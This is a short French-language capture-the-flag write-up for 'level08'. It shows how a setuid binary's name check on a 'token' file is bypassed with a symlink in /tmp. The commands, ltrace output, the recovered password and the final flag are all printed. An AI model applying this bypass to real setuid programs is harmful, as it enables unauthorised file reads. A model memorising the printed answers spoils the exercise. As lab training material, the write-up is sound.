1.4 KiB
1.4 KiB
Lors de mon arriver sur le level08 je remarque tout de suite que j'ai deux fichier sur mon home
ls -l
total 16
-rwsr-s---+ 1 flag08 level08 8617 Mar 5 2016 level08
-rw------- 1 flag08 flag08 26 Mar 5 2016 token
Un executable qui malgres mes tentative ne me donne rien de vraiement precis uniquement mais qui semble lire un fichier
./level08
./level08 [file to read]
Et je tente alors de lire token mais il me met un message d'erreur
./level08 token
You may not access 'token'
Mais la facon dont est fait le program protege uniquement un fichier qui contien token
ltrace ./level08 token
__libc_start_main(0x8048554, 2, 0xbffff7f4, 0x80486b0, 0x8048720 <unfinished ...>
strstr("token", "token") = "token"
printf("You may not access '%s'\n", "token"You may not access 'token'
) = 27
exit(1 <unfinished ...>
+++ exited (status 1) +++
Je decide donc de faire un lien symbolique sur le fichier de token ailleurs (la ou je peux ecrire)
ln -s /home/user/level08/token /tmp/test
Et j'obtiens quelque chose qui ressemble a un flag
./level08 /tmp/test
quif5eloekouj29ke0vouxean
qui n'est pas un flag mais le mot de passe pour flag08 auquel je me connect et fait la commande getflag
getflag
Check flag.Here is your token : 25749xKZ8L7DkSCwJkT9dyv6f